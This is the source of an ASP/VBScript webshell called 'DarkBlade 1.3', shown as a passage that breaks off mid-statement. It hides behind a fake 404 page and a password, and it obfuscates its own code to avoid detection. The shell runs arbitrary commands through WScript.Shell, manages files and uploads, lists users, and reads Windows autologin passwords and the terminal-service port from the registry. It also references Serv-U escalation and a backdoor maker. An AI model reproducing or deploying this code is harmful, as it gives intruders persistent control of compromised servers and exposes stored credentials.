<%@ LANGUAGE='VBScript' CODEPAGE='65001'%> <% Response.Buffer=True Response.CharSet="utf-8" Server.ScriptTimeOut=300 '-------------------------------Config------------------------------- 'Private version, do not share it to anybody! 'DarkBlade 1.3 by B100d5w0rd, msn:[email protected] 'Final version, no more update 'Thanks to these hackers:Bin, Luyu, Sht Const pass="109707CB7C10970CCA81ACE832947C" 'tencentisapieceofshit Const needEncode=True Const encodeNum=20 Const isDebugMode=False Const encodeCut="_" Const pamtoEncode="thePath|cmdPath|cmdStr|connStr|queryStr|regPath|pubPam|txtObjInfo|StrTable|mdbPath|searchkey|suUser|suPass|suPath|suCmd|targetUrl|portList|dicList|ipList|destName|loadpath" Const showLogin="login" Const defaultChr="GB2312" Const aspExt="asp|asa|cer|cdx" Const textExt="asp|asa|cer|cdx|aspx|asax|ascx|cs|jsp|php|txt|inc|ini|js|htm|html|xml|config" Const sqlPageSize=50 Const fToPre="zzzzzzzz.html" Const bOtherUser=True ' '-------------------------------Config------------------------------- '-------------------Transform sign------------------ Const transformSign="'-------------------Transform sign------------------" Const notToTransform="upload|action|file|password|text|server|title|user|login|value|port|filename|name|htmlEnc|type|http|pass|files|path|attributes|goaction|info|download|logout|login|content|charset|font|color|size|value|width|rows|class|name|value|width|size|color|save|down|span|echo|form|byval|find|vbcrlf" Const strs_toTransform="command|Radmin|NTAuThenabled|FilterIp|IISSample|PageCounter|PermissionChecker|BrowserType|ContentRotator|SystemRoot|ComSpec|PATHEXT|PROCESSOR|ARCHITECTURE|IDENTIfIER|REVISION|Physical|Memory|Installed|NUMBER_OF_PROCESSORS|PROCESSOR_ARCHITECTURE|Os2LibPath|NameServer|DefaultGateway|HKEY|HKLM|LOCAL_MACHINE|SOFTWARE|CurrentVersion|Winlogon|CurrentControlSet|ControlSet001|WinStations|RDP-Tcp|PROCESSOR_IDENTIfIER|PROCESSOR_LEVEL|PROCESSOR_REVISION|Windows NT|AutoAdminLogon|DefaultUserName|DefaultPassword|ComputerName|DisplayLastUserName|anonymous|LanmanServer|AutoShareServer|EnableSharedNetDrives|EnableSecurityFilters|Engines|SandBoxMode|openrowSet|sp_oacreate|sp_oamethod|sp_oasetproperty|net user|PasswordExpired|Scripting.|.FileSystemObject|Shell.|.Application|WScript.|.Shell|.Stream|Adodb.|.Connection|.RecordSet|MSXML2.|.XMLHTTP|SoftArtisans.|.FileUp|.FileManager|Persits.|MSWC.|xplog70|addextEndedproc|master|cmdShell|regwrite|system32|SetDOMAIN|TZOEnable|43958|Serv-U|SetUSERSetUP|LoginMesFile|RelPaths|DELETEDOMAIN|MAINTENANCE|Maintenance|HomeDirDrive|NeedSecure|HideHidden|AlwaysAllowLogin|ChangePassword|QuotaEnable|SpeedLimitUp|SpeedLimitDown|MaxNrUsers|IdleTimeOut|RWAMELCDP|upadmin|LocalAdministrator|13709620|444553540000|72C24DD5|98424B88AFB8|Server.Execute|Eval|localgroup|MaxUsersLoginPerIP|Server.Execute|ShellExecute|Terminal|Unauthorized|DarkBladePass|AuThenticate|AUTH_USER|WinDir|ExecuteGlobal|sp_addsrvrolemember" Const funcs_toTransform="SavetoFile|CopyFile|OpenTextFile|CreateTextFile|DeleteFile|GetParentFolder|GetExtension|CreateFolder|MoveFolder|GetFileName|CopyFolder|MoveFile|DeleteFolder|NameSpace|Environment|ExpandEnvironmentStrings|RegRead|Exec|Run|GetSystemInformation|Save|CopyHere|MoveHere|ReadAll|DriveLetter|DateCreated|LastModIfied|LastAccessed|Filesystem|TotalSize|PasswordMinimumLength|AccountDisabled|IsAccountLocked|AccountExpirationDate|LoadFromFile" Dim currentPath,tmpPath,objCountFile,tempFileData,splitArray,strArray_toTransform,str_transformed,varArray_forbidden,funcArray_toTransform,total,arr_notToTransform,var_toTransform_list,strArr_toTransform,funcArr_toTransform,regex,filetopretEnd,nopretEnd,strForbidden strForbidden="dim|sub|end|for|and|now|get|Set|chr|int|day|int|rnd|not|len|mid|sun|asc|cos|app|xor|imp|fix|atn|err|rgb|else|const|true|false|call|each|then|next|redim|error|null|empty|until|loop|case|step|log|dir|stop|str" Set regex=new RegExp regex.Global=True regex.IgnoreCase=True regex.MultiLine=True arr_notToTransform=Split(notToTransform,"|") funcArr_toTransform=Split(funcs_toTransform,"|") var_toTransform_list="" strArr_toTransform=Split(strs_toTransform,"|") strUbound=UBound(strArr_toTransform) filetopretEnd=request("filetopretEnd") nopretEnd=request("nopretEnd") serveren=request("serveren") Call transinit() Sub transinit() If filetopretEnd=""And nopretEnd=""Then Call userInit() response.End Else Call Transform() End If Response.Redirect"?goaction=login" End Sub Sub userInit() Dim fsoX,theFolder Set fsoX=CreateObj("Scripting.FileSystemObject") Set theFolder=fsoX.GetFolder(mapath(".")) echo"<form method=post>" echo"Running first time,choose the file to pretEnd as." echo"<select name=""filetopretEnd"">" For Each subFile In theFolder.Files If(Lcase(Right(subFile.Name,3))="asp"Or Lcase(Right(subFile.Name,3))="asa")And subFile.Name<>getRight(getServerVariable("PATH_INFO"),"/") Then echo"<option value="""&subFile.Name&""">"&subFile.Name&"</option>" Next echo"</select>" echo"<input type=checkbox name=nopretEnd value=1>No pretEnding<br>" echo"Server Encode:<input type=text name=serveren value='GB2312'><br>" echo"<input type=submit value="" OK "">" echo"</form>" End Sub Sub Transform() Dim fsoX,crlf crlf=Chr(13)&Chr(10) currentPath=mapath(getCurrentFileName(request.ServerVariables("URL"))) tempFileData=readSelf(currentPath) splitArray=Split(tempFileData,transformSign) If nopretEnd=""Then nopretEnd=0 tempFileData=Replace(splitArray(0)&splitArray(3),"encodeNum=20","encodeNum="&getRndNum(20,81)) If nopretEnd<>1 And filetopretEnd<>""Then tempFileData=Replace(tempFileData,"zzzzzzzz.html",filetopretEnd) If serveren<>""Then tempFileData=Replace(tempFileData,"GB2312",serveren) tempFileData=Replace(tempFileData,Chr(9),"") tempFileData=Replace(tempFileData,crlf&crlf,crlf) tempFileData=Replace(tempFileData,crlf&crlf,crlf) do_varTransform() do_strTransform() do_funcTransform() saveSelf currentPath,tempFileData End Sub Function readSelf(thePath) Set fsoX=CreateObj("Scripting.FileSystemObject") Set objCountFile=fsoX.OpenTextFile(thePath,1,True) readSelf=objCountFile.ReadAll objCountFile.Close Set objCountFile=Nothing End Function Sub saveSelf(thePath,fileContent) Set fsoX=CreateObj("Scripting.FileSystemObject") Set objCountFile=fsoX.CreateTextFile(thePath,True) objCountFile.Write tempFileData objCountFile.Close Set objCountFile=Nothing End Sub Sub do_varTransform 'Sub/Function Transform Dim matchColl,arr_varToTransform,matchArr regex.Pattern="(sub|function) +[\w]+(?= *\()" regex.Global=True regex.IgnoreCase=True regex.MultiLine=True Set matchColl=regex.Execute(tempFileData) For Each matched In matchColl matched=regRep(matched,"(sub|function) +","",False) addToVarArr matched Next For Each tmpVar_toTramsform In Split(var_toTransform_list,"|") do_varReplace tmpVar_toTramsform,0 Next var_toTransform_list="" 'Var Transform regex.Pattern="dim +[\w ,]+" Set matchColl=regex.Execute(tempFileData) For Each matched In matchColl matched=Lcase(matched) matched=Trim(Replace(Lcase(matched),"dim ","")) For Each varToTransform In Split(matched,",") addToVarArr varToTransform Next Next regex.Pattern="const\s+[\w]+(?=\s*=)" Set matchColl=regex.execute(tempFileData) For Each matched In matchColl matched=Replace(Lcase(matched),"const","") matched=Trim(Replace(Lcase(matched),"set","")) addToVarArr matched Next 'Parameter Transform regex.Pattern="(function|sub)\s+[\w]+\([\w,]+" Set matchColl=regex.execute(tempFileData) For Each matched In matchColl matched=getRight(Lcase(matched),"(") For Each subPam In Split(matched,",") If InStr(subPam," ")>0 Then subPam=getRight(subPam," ") addToVarArr Trim(subPam) Next Next regex.Pattern="case\s*""[^\r\n]+""" Set matchColl=regex.execute(tempFileData) For Each matched In matchColl matched=regRep(matched,"case\s*""","",False) matched=Replace(matched,"""","") If InStr(matched,",")>0 Then For Each subMacthed In Split(matched,",") addToVarArr Trim(subMacthed) Next Else addToVarArr matched End If Next For Each tmpVar_toTramsform In Split(var_toTransform_list,"|") do_varReplace tmpVar_toTramsform,3 Next var_toTransform_list="" End Sub Sub do_varReplace(varToTransform,intType) If varToTransform=""Then Exit Sub Dim varTransformed,strPattern varTransformed=getRndStr() strForbidden=strForbidden&"|"&Lcase(varTransformed) varToTransform=Replace(varToTransform,".","\.") Select Case intType Case 0 strPattern="([^\w\\])"&varToTransform&"(?![\w\\])" tempFileData=regRep(tempFileData,strPattern,"$1"&varTransformed,False) Case Else strPattern="([^\w\\])"&varToTransform&"(?![\w\\])" tempFileData=regRep(tempFileData,strPattern,"$1"&varTransformed,False) End Select End Sub Sub do_strTransform() For Each str_toTransform In strArr_toTransform do_strReplace str_toTransform Next End Sub Sub do_strReplace(str) If str=""Then Exit Sub Dim rndNum,str_transformed,strPattern rndNum=getRndNum(2,Len(str)-3) str_transformed=Left(str,rndNum)&"""&"&getRndStr()&"&"""&Right(str,Len(str)-rndNum) strPattern="\b"&Replace(Replace(str,".","\."),"_","\_")&"\b" echo strPattern&"<br>" tempFileData=regRep(tempFileData,strPattern,str_transformed,False) End Sub Sub do_funcTransform Dim tmpFunc,matchColl,matched regex.Global=True regex.IgnoreCase=True regex.MultiLine=True For Each tmpFunc In funcArr_toTransform regex.Pattern="[^\n\r]+\."&tmpFunc&"\b[^\n\r]+" Set matchColl=regex.Execute(tempFileData) For Each matched In matchColl do_funcReplace matched,tmpFunc Next Next End Sub Sub do_funcReplace(strLine,func_toTransform) If func_toTransform=""Or strLine=""Then Exit Sub Dim tmpFunc,func_transformed,rndStr,rndNum,line_transformed If Left(Lcase(strLine),3)="if "Or Left(Lcase(strLine),4)="for "Then Exit Sub rndStr=getRndStr() rndNum=getRndNum(1,Len(func_toTransform)-1) func_transformed=Left(func_toTransform,rndNum)&"""&"&rndStr&"&"""&Right(func_toTransform,Len(func_toTransform)-rndNum) regex.Global=True regex.IgnoreCase=True regex.MultiLine=True regex.Pattern="""[^&]*\b"&func_toTransform&"\b[^&]*""" If Left(line_transformed,8)="execute " Or regex.test(strLine)Then line_transformed=Replace(strLine,func_toTransform,func_transformed,1,-1,1) Else line_transformed=Replace(strLine,"""","""""") line_transformed=Replace(line_transformed,func_toTransform,func_transformed,1,-1,1) line_transformed="execute """&line_transformed&"""" End If tempFileData=Replace(tempFileData,strLine,line_transformed) End Sub Sub addToVarArr(str) If Not isTransAble(str)Then Exit Sub If InStr(var_toTransform_list,"|"&str)>0 Or InStr(var_toTransform_list,str&"|")>0 Then Exit Sub If var_toTransform_list=""Then var_toTransform_list=str Else var_toTransform_list=var_toTransform_list&"|"&str End If End Sub Function isTransAble(str) If Len(str)<4 Then isTransAble=False Exit Function End If For Each strNotTransform In arr_notToTransform If strNotTransform=Lcase(str)Then isTransAble=False Exit Function End If Next isTransAble=True End Function Function getCurrentFileName(url) getCurrentFileName=Right(url,Len(url)-InStrrev(url,"/")) End Function Function getRndStr() Dim rndStr rndStr="" Do While not chkRndStr(rndStr) rndStr="" For i=1 To getRndNum(3,3) rndStr=rndStr&getRndChar() Next Loop getRndStr=rndStr End Function Function chkRndStr(Str) Str=Lcase(str) If Left(Str,1)="h"Or Len(str)<3 Then chkRndStr=False Exit Function End If If InStr(strForbidden,"|"&Str)>0 Or InStr(strForbidden,Str&"|")>0 Then chkRndStr=False Exit Function End If chkRndStr=true End Function Function getRndChar() Dim SYMBOL_Char:SYMBOL_Char="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" Randomize getRndChar=Mid(SYMBOL_Char,getRndNum(1,52),1) End Function Function getRndNum(a,b) Randomize getRndNum=Int(b * rnd+a) End Function Function regRep(str,strPattern,replaced,needFormat) If needFormat Then strPattern=Replace(strPattern,"\","\\") strPattern=Replace(strPattern,".","\.") strPattern=Replace(strPattern,"?","\?") strPattern=Replace(strPattern,"+","\+") strPattern=Replace(strPattern,"(","\(") strPattern=Replace(strPattern,")","\)") strPattern=Replace(strPattern,"*","\*") strPattern=Replace(strPattern,"[","\[") strPattern=Replace(strPattern,"]","\]") End If regex.Pattern=strPattern regRep=regex.Replace(str,replaced) End Function '-------------------Transform sign------------------ Dim goaction,thePath,cmdStr,connStr,regPath,pubPam,serverName,objXml,objWs,objFso,objSa,objStream,objRe,pagePath,pageName,startTime,EndTime,aspPath,rootPath,errMsg,txtObjInfo,trId,SessionKey,SessionValue,cmdPath,formId,subAct,truePath,localName,strFileMethod,fileContent,newOneName,newOneType,dbType,conn,strTable,intPage,mdbName,dbname,packMethod,mdbName2,mdbPath,searchkey,useReg,suUser,suPass,suPort,suPath,suCmd,deldomain,newdomain,newuser,suquit,loginuser,loginpass,mt,targetUrl,ipList,portList,dicList,outPath,outExt,cmdDoTExeFiLe,userPass,queryStr,sversion,cookiePre,cookiePass,strObj,strReplaceTo,needReplace,searchExt,getInc,chkPath,needecho,datem,strRefFile,fsoAttrib,logged,shellenv,nuser,npass,nport,cls_upload,destName,loadPath,strfrm,sqlver,moveme sversion="DarkBlade 1.3 Private" cookiePre="DarkBlade" cookiePass="DarkBladePass" doInit() logged=isIn() If logged Then pamInit() Else goaction=request("goaction") End If If Not logged And goaction<>showLogin Then show404() If bOtherUser And Trim(getServerVariable("AUTH_USER"))="" Then Response.Status="401 Unauthorized" Response.Addheader"WWW-AuThenticate","BASIC" If getServerVariable("AUTH_USER")=""Then Response.End() End If Select Case goaction Case showLogin pageLogin() Case"objOnSrv" PageObjOnSrv() Case"userList" PageUserList() Case"CSInfo" PageCSInfo() Case"WsCmdRun" PageWsCmdRun() Case"infoAboutSrv" PageInfoAboutSrv() Case"MsDataBase" PageMsDataBase() Case"OtherTools" PageOtherTools() Case"TxtSearcher" PageTxtSearcher() Case"ServUp" PageServUp() Case"ScanShell" PageScan() Case"Logout" PagedoLogout() Case"AddToMdb" PageAddToMdb() Case"SaFileExplorer","FsoFileExplorer" PageFileExplorer() Case Else PageFileExplorer() End Select doFin Sub doInit() If Not isDebugMode Then On Error Resume Next startTime=Timer() Dim formContent,queryContent,upformContent,Sessions,Session_Array,sescontent,strTodecode,pamArrtoEncode servurl=getServerVariable("URL") Set objXml=CreateObj("MSXML2.XMLHTTP") Set objWs=CreateObj("WScript.Shell") Set objFso=CreateObj("Scripting.FileSystemObject") Set objSa=CreateObj("Shell.Application") If Not IsObject(objWs)Then Set objWs=CreateObj("WScript.Shell.1") If Not IsObject(objSa)Then Set objSa=CreateObj("Shell.Application.1") Set objRe=new RegExp objRe.Global=True objRe.IgnoreCase=True objRe.MultiLine=True serverName=getServerVariable("SERVER_NAME") pagePath=getServerVariable("PATH_INFO") pageName=Lcase(getRight(pagePath,"/")) aspPath=mapath(".") rootPath=mapath("/") formId=1 trId=1 End Sub Sub pamInit() For Each queryContent In request.queryString execute queryContent&"=request.queryString("""&queryContent&""")" Next For Each formContent In request.Form execute formContent&"=request.form("""&formContent&""")" Next If InStr(getServerVariable("CONTENT_TYPE"),"multipart/form-data")=1 Then Set cls_upload=new upload_5xsoft For Each upformContent In cls_upload.objForm execute upformContent&"=cls_upload.objForm("""&upformContent&""")" Next End If pamArrtoEncode=Split(pamtoEncode,"|") For Each strTodecode In pamArrtoEncode execute""&strTodecode&"=secretDecode("&strTodecode&")" Next If Right(thePath,1)="\"And Len(thePath)>3 Then thePath=Left(thePath,Len(thePath)-1) End Sub Sub doFin() If Not isDebugMode Then On Error Resume Next Dim timeProcessed objXml.abort Set objXml=Nothing Set objWs=Nothing Set objFso=Nothing Set objSa=Nothing Set objRe=Nothing EndTime=timer() timeProcessed=EndTime-startTime echo"<br></div>" doTable"100%" echo"<tr class=""head"">" echo"<td>" echoLine errMsg timeProcessed=FormatNumber(timeProcessed,5) If Left(timeProcessed,1)="."Then timeProcessed="0"&timeProcessed echoLine"<br>" echo"<div align=right>Processed in :"&timeProcessed&"seconds</div></td></tr></table></body></html>" Response.End() End Sub Sub pageLogin() If Not isDebugMode Then On Error Resume Next userPass=request("userPass") If userPass<>""Then userPass=CFSEncode(userPass) If CFSEncode(userPass)=pass Then Response.Cookies(cookiePass)=userPass Response.Redirect(pagePath) Else errMsgAdd"Fuck you,get out!" End If End If showTitle"Login" echo"<center><br>" doForm False echo"<b>Password : </b>" doInput"password","userPass","","30","" echo" " doSubmit"Get In" echo"</center></form>" End Sub Sub PageInfoAboutSrv() If Not isDebugMode Then On Error Resume Next Dim i,objWshSysEnv,aryExEnvList,strExEnvList,intCpuNum,strCpuInfo,strOS,terminalPortPath,terminalPortKey,termPort strExEnvList="SystemRoot|WinDir|ComSpec|TEMP|TMP|NUMBER_OF_PROCESSORS|OS|Os2LibPath|Path|PATHEXT|PROCESSOR_ARCHITECTURE|"&_ "PROCESSOR_IDENTIfIER|PROCESSOR_LEVEL|PROCESSOR_REVISION" aryExEnvList=Split(strExEnvList,"|") Set objWshSysEnv=objWs.Environment("SYSTEM") intCpuNum=getServerVariable("NUMBER_OF_PROCESSORS") If IsNull(intCpuNum)Or intCpuNum=""Then intCpuNum=objWshSysEnv("NUMBER_OF_PROCESSORS") End If strOS=getServerVariable("OS") If IsNull(strOS)Or strOS=""Then strOS=objWshSysEnv("OS") strOs=strOs&"(probably Windows 2003)" End If strCpuInfo=objWshSysEnv("PROCESSOR_IDENTIfIER") showTitle"Server Infomation" doTable"100%" doTh echo"<td colspan=""2""align=""center"">" echo"<b>Server parameters:</b>" echo"</td>" doTtr doTr 0 doTd"Server name:","" doTd serverName,"" doTtr doTr 1 doTd"Server IP:","" doTd getServerVariable("LOCAL_ADDR"),"" doTtr doTr 0 doTd"Server port:","" doTd getServerVariable("SERVER_PORT"),"" doTtr doTr 1 doTd"Server memory","" doTd getTheSize(objSa.GetSystemInformation("PhysicalMemoryInstalled")),"" doTtr doTr 0 doTd"Server time","" doTd Now,"" doTtr doTr 1 doTd"Server soft","" doTd getServerVariable("SERVER_SOFTWARE"),"" doTtr doTr 0 doTd"Script timeout","" doTd Server.ScriptTimeout,"" doTtr doTr 1 doTd"Number of cpus","" doTd intCpuNum,"" doTtr doTr 0 doTd"Info of cpus","" doTd strCpuInfo,"" doTtr doTr 1 doTd"Server OS","" doTd strOS,"" doTtr doTr 0 doTd"Server script engine","" doTd ScriptEngine&"/"&ScriptEngineMajorVersion&"."&ScriptEngineMinorVersion&"."&ScriptEngineBuildVersion,"" doTtr doTr 1 doTd"File full path","" doTd getServerVariable("PATH_TRANSLATED"),"" doTtr trId=0 For i=0 To UBound(aryExEnvList) doTr trId doTd aryExEnvList(i)&":","" doTd objWs.ExpandEnvironmentStrings("%"&aryExEnvList(i)&"%"),"" doTtr trIdAdd Next doTtable chkerr(Err) echo"<br>" Set objWshSysEnv=Nothing Dim objTheDrive doTable"100%" doTh echo"<td colspan=""6""align=""center"">" echo"<b>Info of disks</b>" echo"</td>" doTtr doTr 0 doTd"Driver letter","" doTd"Type","" doTd"Label","" doTd"File system","" doTd"Space left","" doTd"Total space","" doTtr trId=1 For Each objTheDrive In objFso.Drives Dim dLetter,dType,vName,fSystem,fSpace,tSize dLetter=objTheDrive.DriveLetter If Lcase(dLetter)<>"a"Then dType=getDriveType(objTheDrive.DriveType) vName=objTheDrive.VolumeName fSystem=objTheDrive.Filesystem fSpace=getTheSize(objTheDrive.FreeSpace) tSize=getTheSize(objTheDrive.TotalSize) doTr trId doTd dLetter,"" doTd dType,"" doTd vName,"" doTd fSystem,"" doTd fSpace,"" doTd tSize,"" doTtr End If dLetter="" dType="" vName="" fSystem="" fSpace="" tSize="" trIdAdd Next doTtable chkerr(Err) Set objTheDrive=Nothing Dim objTheFolder Set objTheFolder=objFso.GetFolder(rootPath) echo"<br>" doTable"100%" doTh echo"<td colspan=""2""align=""center"">" echo"<b>Info of site:</b>" echo"</td>" doTtr doTr 0 doTd"Physical path:","" doTd rootPath,"" doTtr doTr 1 doTd"Current size:","" doTd getTheSize(objTheFolder.Size),"" doTtr doTr 0 doTd"File count:","" doTd objTheFolder.Files.Count,"" doTtr doTr 1 doTd"Folder count:","" doTd objTheFolder.SubFolders.Count,"" doTtr doTtable chkerr(Err) echoLine"<br>" Dim autoLoginPath,autoLoginUserKey,autoLoginPassKey Dim isAutoLoginEnable,autoLoginEnableKey,autoLoginUsername,autoLoginPassword terminalPortPath="HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\" terminalPortKey="PortNumber" termPort=ReadReg(terminalPortPath&terminalPortKey) If termPort=""Then termPort="Can't get terminal port.<br/>" autoLoginPath="HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\" autoLoginEnableKey="AutoAdminLogon" autoLoginUserKey="DefaultUserName" autoLoginPassKey="DefaultPassword" isAutoLoginEnable=ReadReg(autoLoginPath&autoLoginEnableKey) If isAutoLoginEnable=0 Then autoLoginUsername="Autologin isn't enabled" Else autoLoginUsername=ReadReg(autoLoginPath&autoLoginUserKey) End If If isAutoLoginEnable=0 Then autoLoginPassword="Autologin isn't enabled" Else autoLoginPassword=ReadReg(autoLoginPath&autoLoginPassKey) End If doTable"100%" doTh echo"<td colspan=""2""align=""center"">" echo"<b>Info of Terminal port&Autologin</b>" echo"</td>" doTtr doTr 0 doTd"Terminal port:","" doTd termPort,"" doTtr doTr 1 doTd"Autologin account:","" doTd autoLoginUsername,"" doTtr doTr 0 doTd"Autologin password:","" doTd autoLoginPassword,"" doTtr doTtable echo"</ol>" chkerr(Err) End Sub Sub PageObjOnSrv() Dim i,objTmp,strObjectList,strDscList strObjectList="MSWC.AdRotator,MSWC.BrowserType,MSWC.NextLink,MSWC.TOOLS,MSWC.Status,MSWC.Counters,IISSample.ContentRotator,IISSample.PageCounter,MSWC.PermissionChecker,Adodb.Connection,SoftArtisans.FileUp,SoftArtisans.FileManager,LyfUpload.UploadFile,Persits.Upload.1,W3.Upload,JMail.SmtpMail,CDONTS.NewMail,Persits.Mailsender,SMTPsvg.Mailer,DkQmail.Qmail,Geocel.Mailer,IISmail.Iismail.1,SmtpMail.SmtpMail.1,SoftArtisans.ImageGen,W3Image.Image,Scripting.FileSystemObject,Adodb.Stream,Shell.Application,Shell.Application.1,WScript.Shell,WScript.Shell.1,WScript.Network,hzhost.modules" strDscList="Ad Rotator,Browser info,NextLink,,,Counters,Content rotator,,Permission checker,ADODB connection,SA-FileUp,SoftArtisans FileManager,LyfUpload,ASPUpload,Dimac upload,Dimac JMail,CDONTS SMTP mail,ASPemail,ASPmail,dkQmail,Geocel mail,IISmail,SmtpMail,SoftArtisans ImageGen,Dimac W3Image,FSO,Stream ,,,,,,Hzhost module" aryObjectList=Split(strObjectList,",") aryDscList=Split(strDscList,",") showTitle"Server Object Probe" echo"Check for other ObjectId or ClassId.<br>" doForm True doInput"text","txtObjInfo",txtObjInfo,50,"" echo" " doSubmit"Check" doFform If txtObjInfo<>""Then doUl Call getObjInfo(txtObjInfo,"") echo"</ul>" End If echo"<hr/>" echo"<ul class=""info""><li><u>Object name</u>Status and more</li>" For i=0 To UBound(aryDscList) Call getObjInfo(aryObjectList(i),aryDscList(i)) Next echo"</ul><hr/>" End Sub Sub PageUserList() Dim objUser,objGroup,objComputer showTitle"Users and Groups Imformation" Set objComputer=getObj("WinNT://.") objComputer.Filter=Array("User") doShowHideMe"User",False doTable"100%" For Each objUser in objComputer doTh echo"<td colSpan=""2""align=""center""><b>"&objUser.Name&"</b></td>" doTtr showUserInfo(objUser.Name) Next doTtable echo"</span><br>" chkerr(Err) doShowHideMe"UserGroup",False objComputer.Filter=Array("Group") doTable"100%" trId=1 For Each objGroup in objComputer doTr trId doTd objGroup.Name,"" doTd objGroup.Description,"" doTtr trIdAdd Next doTtable echo"</span>" chkerr(Err) End Sub Sub PageCSInfo() If Not isDebugMode Then On Error Resume Next Dim strKey,strVar,strVariable,SessionContent If SessionKey<>""Then Session(SessionKey)=SessionValue showTitle"Server-Client Information" doShowHideMe"ServerVariables",True doTable"100%" trId=1 For Each strVariable In Request.ServerVariables doTr trId doTdNoWrap strVariable doTd getServerVariable(strVariable),"" doTtr trIdAdd Next doTtable echoLine"</span><br>" doShowHideMe"Application",True doTable"100%" trId=1 For Each strVariable In Application.Contents doTr trId doTdNoWrap strVariable doTd htmlEnc(Application(strVariable)),"" doTtr trIdAdd Next doTtable echoLine"</span><br>" doShowHideMe"Session",True echo"<br>(ID"&Session.SessionId&")" doTable"100%" trId=1 For Each strVariable In Session.Contents SessionContent=Session(strVariable) doTr trId doTdNoWrap strVariable doTd htmlEnc(SessionContent),"" doTtr trIdAdd Next doTr trId doForm False doTdSubmit"Set Session","20%" echo"<td width=""80%""> Key :" doInput"text","SessionKey","",30,"" echo"Value :" doInput"text","SessionValue","",30,"" echo"</td>" doFform doTtr doTtable echoLine"</span><br>" doShowHideMe"Cookies",True doTable"100%" trId=1 For Each strVariable In Request.Cookies If Request.Cookies(strVariable).HasKeys Then For Each strKey In Request.Cookies(strVariable) doTr trId doTdNoWrap strVariable&"("&strKey&")" doTd htmlEnc(Request.Cookies(strVariable)(strKey)),"" doTtr trIdAdd Next Else doTr trId doTdNoWrap strVariable doTd htmlEnc(Request.Cookies(strVariable)),"" doTtr trIdAdd End If Next doTtable echo"</span>" chkerr(Err) End Sub Sub PageWsCmdRun() Dim CmdResult,tmpcmdstr If Not isDebugMode Then On Error Resume Next showTitle("WScript.Shell Execute") If cmdPath<>""Then If InStr(Lcase(cmdPath),"cmd.exe")>0 And InStr(cmdStr,"/c ")<1 Then tmpcmdstr=cmdPath&" /c "&cmdStr Else tmpcmdstr=cmdPath&" "&cmdStr End If If needecho=1 Then CmdResult=objWs.Exec(tmpcmdstr).StdOut.ReadAll() Else objWs.Run tmpcmdstr,0,False End If chkerr(Err) Else cmdPath="cmd.exe" End If doTable"100%" doForm True doTr 1 doTd"Path","20%" doTdInput"text","cmdPath",cmdPath,"60%","","" echo"<td>" doChkBox"needecho",1," View result ","checked" doSubmit"Run" echo"</td>" doTtr doTr 0 doTd"Parameters","" doTdInput"text","cmdStr",cmdStr,"","","2" doTtr doFform doTtable echo"<hr><b>Result:</b><br><span class=""alt1Span"">"&htmlEnc(CmdResult)&"</span>" chkerr(Err) End Sub Sub PageFileExplorer() If Not isDebugMode Then On Error Resume Next If thePath=""Then thePath=pubPam If thePath=""Then thePath=aspPath If goaction<>"SaFileExplorer"Then goaction="FsoFileExplorer" If subAct="down"Then DownTheFile() Response.End() End If If goaction="FsoFileExplorer"Then strFileMethod="fso" showTitle("FSO File Explorer") Else strFileMethod="sa" showTitle("APP File Explorer") End If Select Case subAct Case"delFile","delFolder" delOne() thePath=getLeft(thePath,"\",False) Case"newone" newOne() Case"save","utfSave" saveFile() thePath=getLeft(thePath,"\",False) Case"fileUpload" StreamUpload() Case"showEdit","utfEdit" showEdit() Case"rnFile","rnFolder" renameOne() thePath=getLeft(thePath,"\",False) Case"cpFile","mvFile","cpFolder","mvFolder" moveCopyOne() thePath=getLeft(thePath,"\",False) Case"getattrib" getAttributes() Case"Setattrib" SetAttributes() thePath=getLeft(thePath,"\",False) Case"mkDoor" MakeBackDoor() End Select If Len(thePath)<3 Then thePath=thePath&"\" FileExplorer() End Sub Sub FileExplorer() Dim theFolder,folderId,extName,parentFolderName,objSize,fullPath,objLastModIfied,nowpath If Not isDebugMode Then On Error Resume Next If strFileMethod="fso"Then Set theFolder=objFso.GetFolder(thePath) parentFolderName=objFso.GetParentFolderName(thePath) Else Set theFolder=objSa.NameSpace(thePath) dieErr Err parentFolderName=getLeft(thePath,"\",False) If InStr(parentFolderName,"\")<1 Then parentFolderName=parentFolderName&"\" End If End If nowpath=thePath If Right(nowpath,1)<>"\"Then nowpath=nowpath&"\" doHidden"nowPath",nowpath doForm True echo"<b>Current Path :</b>" doInput"text","thePath",thePath,120,"" echoLine"" doSelect"","170px","onchange=""javascript:if(this.value!=''){dosubmit('"&goaction&"','',this.value);}""" doOption"","Drivers/Comm folders" doOption htmlEnc(mapath(".")),"." doOption htmlEnc(mapath("/")),"/" doOption"","----------------" If Lcase(strFileMethod)="fso"Then For Each drive In objFso.Drives doOption drive.DriveLetter&":\",drive.DriveLetter&":\" Next doOption"","----------------" End If doOption"C:\Program Files","C:\Program Files" doOption"C:\Program Files\RhinoSoft.com","RhinoSoft.com" doOption"C:\Program Files\Serv-U","Serv-U" doOption"C:\Program Files\Radmin","Radmin" doOption"C:\Program Files\Microsoft SQL Server","Mssql" doOption"C:\Program Files\Mysql","Mysql" doOption"","----------------" doOption"C:\Documents and Settings\All Users","All Users" doOption"C:\Documents and Settings\All Users\Documents","Documents" doOption"C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere","PcAnywhere" doOption"C:\Documents and Settings\All Users\Start Menu\Programs","Start Menu->Programs" doOption"","----------------" doOption"D:\Program Files","D:\Program Files" doOption"D:\Serv-U","D:\Serv-U" doOption"D:\Radmin","D:\Radmin" doOption"D:\Mysql","D:\Mysql" doSselect doSubmit"Go" doFform echoLine"<br><form method=""post"" id=""upform""action="""&pagePath&"""enctype=""multipart/form-data"">" doHidden"subAct","fileUpload" doHidden"thePath",thePath doTable"60%" doTr 1 doTdInput"file","upfile","","30%","","" doTd"Save As :","15%" doTdInput"text","destName","","30%","","" doTdInput"button",""," Upload ","20%","onClick=""javascript:dosubmit('"&goaction&"','fileUpload','')""","" doTtr doFform If strFileMethod="fso"Then doTr 0 doForm True doHidden"thePath",thePath doHidden"subAct","newone" doTdInput"text","newOneName","","","","" echo"<td colspan='2'>" doInput"radio","newOneType","file","","checked" echo"File" doInput"radio","newOneType","folder","","" echo"Folder</td>" doTdSubmit"New one","" 'doTdInput"button","makedoor","Make backdoor","","onClick=""javascript:dosubmit('"&goaction&"','mkDoor','"&doPathFormat(thePath)&"')""","" doFform doTtr End If echo"</table><hr>" If 